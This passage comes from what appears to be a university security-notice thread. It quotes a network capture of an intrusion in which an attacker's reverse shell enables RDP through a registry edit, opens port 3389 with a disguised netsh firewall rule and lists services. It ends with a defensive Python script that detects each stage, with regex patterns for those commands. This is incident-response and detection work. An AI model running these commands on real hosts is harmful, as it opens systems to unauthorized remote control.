> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>
>
> T 2017/01/18 02:46:44.733944 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> reg.exe ADD
> "HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
> Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f
>
>
> T 2017/01/18 02:46:45.104427 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:45.104905 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> The operation completed successfully...
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:46:45.432785 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:56.087756 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> netsh advfirewall firewall add rule name = "Windows Service Host"
> dir=in action=allow protocol=TCP localport=3389
>
>
> T 2017/01/18 02:46:56.088487 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> netsh advfirewall firewall add rule name = "Windows Service Host"
> dir=in action=allow protocol=TCP localport=3389
>
>
> T 2017/01/18 02:46:56.596211 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:59.117911 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> Ok..
> .
>
> T 2017/01/18 02:46:59.432046 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:46:59.432624 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> T 2017/01/18 02:46:59.761298 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:47:16.188439 188.132.176.26:4000 ->
> 128.111.28.118:20138 [AP]
> net start
>
>
> T 2017/01/18 02:47:16.189037 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> net start
>
>
> T 2017/01/18 02:47:16.385997 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:47:16.427758 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> These Windows services are started:.
>
>
> T 2017/01/18 02:47:16.428404 128.111.28.118:20138 ->
> 188.132.176.26:4000 [A]
> .
> Adobe Acrobat Update Service.
> AMD External Events Utility.
> Apple Mobile Device.
> Application Experience.
> Application Information.
> Background Intelligent Transfer Service.
> Base Filtering Engine.
> Bonjour Service.
> Certificate Propagation.
> COM+ Event System.
> Computer Browser.
> Credential Manager.
> Cryptographic Services.
> DCOM Server Process Launcher.
> Desktop Window Manager Session Manager.
> DHCP Client.
> Diagnostic Policy Service.
> Diagnostic Service Host.
> Diagnostics Tracking Service.
> Distributed Link Tracking Client.
> DNS Client.
> Function Discovery Provider Host.
> Function Discovery Resource Publication.
> Group Policy Client.
> Human Interface Device Access.
> IKE and AuthIP IPsec Keying Modules.
> IP Helper.
> iPod Service.
> IPsec Policy Agent.
> LMIGuardianSvc.
> LogMeIn.
> LogMeIn Maintenance Service.
> Microsoft Antimalware Service.
> Microsoft Network Inspection.
> Microsoft Office Click-to-Run Service.
> MT7 Registry Service.
> MT7 Serial Search Service.
> MySQL55.
> Network Connections.
> Network List Service.
> Network Location Awareness.
> Network Store Interface Service.
> Office Software Protection Platform.
> Offline Files.
> Parallels Networking Service.
> Parallels Virtualization Service.
> Plug and Play.
> Pml Driver HPZ12.
> PnP-X IP Bus Enumerator.
> Portable Device Enumerator Service.
> Power.
> Print Spooler.
> Program Compati
>
> T 2017/01/18 02:47:16.428408 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> bility Assistant Service
>
> T 2017/01/18 02:47:16.625665 188.132.176.26:4000 ->
> 128.111.28.118:20138 [A]
> ......
>
> T 2017/01/18 02:47:16.626533 128.111.28.118:20138 ->
> 188.132.176.26:4000 [AP]
> .
> Quality Windows Audio Video Experience.
> Remote Access Connection Manager.
> Remote Desktop Configuration.
> Remote Desktop Services.
> Remote Desktop Services UserMode Port Redirector.
> Remote Procedure Call (RPC).
> Routing and Remote Access.
> RPC Endpoint Mapper.
> Secondary Logon.
> Secure Socket Tunneling Protocol Service.
> Security Accounts Manager.
> Security Center.
> Server.
> Shell Hardware Detection.
> Skype C2C Service.
> SQL Server (SQLEXPRESS).
> SQL Server VSS Writer.
> SSDP Discovery.
> Superfetch.
> System Event Notification Service.
> Tablet PC Input Service.
> TabletServicePen.
> Task Scheduler.
> TCP/IP NetBIOS Helper.
> TeamViewer 11.
> Telephony.
> Themes.
> UPnP Device Host.
> User Profile Service.
> Wacom Consumer Touch Service.
> Windows App Certification Kit Fast User Switching Utility Service.
> Windows Audio.
> Windows Audio Endpoint Builder.
> Windows Driver Foundation - User-mode Driver Framework.
> Windows Event Log.
> Windows Firewall.
> Windows Font Cache Service.
> Windows Image Acquisition (WIA).
> Windows Management Instrumentation.
> Windows Media Player Network Sharing Service.
> Windows Presentation Foundation Font Cache 3.0.0.0.
> Windows Search.
> Windows Update.
> WinHTTP Web Proxy Auto-Discovery Service.
> Workstation.
> .
> The command completed successfully..
> .
> .
> C:\ProgramData\MySQL\MySQL Server 5.5\data>
>
> ----------sample----------
> --
> E. Todd Atkins
> Enterprise Technology Services
> University of California, Santa Barbara http://www.security.ucsb.edu/
>
> **********************************************************************
> The NOC's list of network contacts is used to determine who should 
> receive email such as this. Please direct any requests for changes to 
> this list of network contacts to noc at ucsb.edu.
> **********************************************************************
>


--

Scott Kasai
User Support Specialist
Engineering Computing Infrastructure
University of California, Santa Barbara
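The traffic sample in OIT's notice shows the whole sequence in one connection pair: a login to MySQL as root, recon of @@version_compile_os and @@plugin_dir, a PE image ("MZ ... This program cannot be run in DOS mode") pushed through a SELECT, then an outbound cmd.exe session from the database host to port 4000 in which RDP is switched on via fDenyTSConnections and TCP/3389 is opened in the firewall. As an added example (not part of the ticket, the OIT notice or any UCSB tooling), the following Python script parses ngrep-style output of this shape and flags each of those stages, which is what one would want to run against the full capture when triaging a host like this. The embedded SAMPLE is a constructed, abbreviated transcription of the quoted capture: the wrapped header lines are re-joined, payload bytes are shortened, the mailing-list ">" quoting is removed, and the rule names are my own.

```python
"""Flag the intrusion steps visible in an ngrep-style traffic sample. Added example,
not part of the OIT notice; SAMPLE is a constructed, abbreviated transcription of it."""
import re
from collections import namedtuple
from dataclasses import dataclass

# ngrep "-T" header, with the e-mail's two wrapped header lines re-joined.
HEADER = re.compile(r"^T (?P<ts>\S+ \S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
                    r"(?P<dst>[\d.]+):(?P<dport>\d+) \[\w+\]$")
SQL_RE = re.compile(r"\b(SELECT|SHOW|USE)\s[^\n]*")
RDP_RE = re.compile(r"fDenyTSConnections.*?/d\s+0x0\b", re.I | re.S)
FW_RE = re.compile(r"netsh\s+advfirewall\s+firewall\s+add\s+rule.*?dir=in.*?"
                   r"action=allow.*?localport=3389", re.I | re.S)

# Constructed sample: payloads shortened, '>' quoting removed; ngrep shows non-printables as '.'.
SAMPLE = r"""
T 2017/01/18 02:45:47.684113 188.132.176.26:3549 -> 128.111.28.118:3306 [AP]
V..........@........................root......Ndy....3......;.mysql.mysql_native_password.

T 2017/01/18 02:45:50.427705 188.132.176.26:3549 -> 128.111.28.118:3306 [AP]
....USE MYSQL

T 2017/01/18 02:45:50.800022 188.132.176.26:3549 -> 128.111.28.118:3306 [AP]
.....SELECT @@plugin_dir;

T 2017/01/18 02:45:50.990204 188.132.176.26:3549 -> 128.111.28.118:3306 [A]
.l...SELECT 'MZ.\0.\0\0\0.\0\0\0..\0\0.\0\0\0\0\0\0\0@\0...!..L.!This program cannot be run in DOS mode.<truncated>

T 2017/01/18 02:45:55.049876 128.111.28.118:20138 -> 188.132.176.26:4000 [AP]
Microsoft Windows [Version 6.1.7601]

T 2017/01/18 02:46:19.130812 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
ipconfig

T 2017/01/18 02:46:19.131472 128.111.28.118:20138 -> 188.132.176.26:4000 [AP]
ipconfig

T 2017/01/18 02:46:44.733187 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
reg.exe ADD
"HKEY_LOCAL_Machine\System\CurrentControlSet\Control\Terminal
Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

T 2017/01/18 02:46:56.087756 188.132.176.26:4000 -> 128.111.28.118:20138 [AP]
netsh advfirewall firewall add rule name = "Windows Service Host"
dir=in action=allow protocol=TCP localport=3389
"""

Finding = namedtuple("Finding", "rule ts detail")

@dataclass
class Packet:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: str = ""

def parse_ngrep(text):
    """Group ngrep output into packets: a header line, then payload lines up to a blank line."""
    packets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER.match(line)
        if m:
            cur = Packet(m["ts"], m["src"], int(m["sport"]), m["dst"], int(m["dport"]))
            packets.append(cur)
        elif cur is not None and line:
            cur.payload += line + "\n"
    return packets

def find_indicators(packets):
    """Walk the packets in order and flag each stage seen in the capture."""
    victim = next((p.dst for p in packets if p.dport == 3306), None)  # the MySQL host
    findings = []
    for p in packets:
        pl, to_db, from_victim = p.payload, p.dst == victim and p.dport == 3306, p.src == victim
        if to_db and "root" in pl and "mysql_native_password" in pl:
            findings.append(Finding("mysql-root-login", p.ts, f"{p.src} authenticated to MySQL as root"))
        if to_db and "MZ" in pl and "This program cannot be run in DOS" in pl:
            # A PE header inside a statement: a binary being written through SQL (UDF staging).
            findings.append(Finding("pe-via-sql", p.ts, "PE image embedded in a SQL statement"))
        elif to_db:
            findings += [Finding("sql-statement", p.ts, m.group(0).strip()) for m in SQL_RE.finditer(pl)]
        if from_victim and p.sport != 3306 and pl.startswith("Microsoft Windows [Version"):
            # cmd.exe banner on a connection the victim opened outbound: a reverse shell.
            findings.append(Finding("reverse-shell", p.ts, f"cmd.exe banner sent to {p.dst}:{p.dport}"))
        if victim and not from_victim and p.dport != 3306 and pl.strip(".\n"):
            # Operator keystrokes; cmd.exe echoes them back, so only this direction is counted.
            findings.append(Finding("operator-command", p.ts, " ".join(pl.split())))
            if RDP_RE.search(pl):
                findings.append(Finding("rdp-enabled", p.ts, "fDenyTSConnections set to 0 (RDP enabled)"))
            if FW_RE.search(pl):
                findings.append(Finding("firewall-opened", p.ts, "inbound TCP/3389 allowed"))
    return findings

if __name__ == "__main__":
    print(*find_indicators(parse_ngrep(SAMPLE)), sep="\n")
```

Run against the real capture, the output is an ordered timeline of findings keyed by the ngrep timestamps, which is also what to hand back to OIT when closing the ticket. Two design points: the database host is inferred as whatever was addressed on 3306, so the same script works on other captures without editing addresses, and because cmd.exe echoes every command back to the operator, the operator-command rule deliberately looks only at the attacker-to-victim direction; otherwise every command would be reported twice.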